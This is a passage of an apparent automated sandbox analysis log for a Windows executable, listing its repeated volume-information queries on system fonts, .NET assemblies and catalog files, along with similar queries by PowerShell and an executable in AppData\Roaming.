                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Users\user\Desktop\s2Jg1MAahY.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeQueries volume information: C:\Users\user\AppData\Roaming\GedTanqRR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
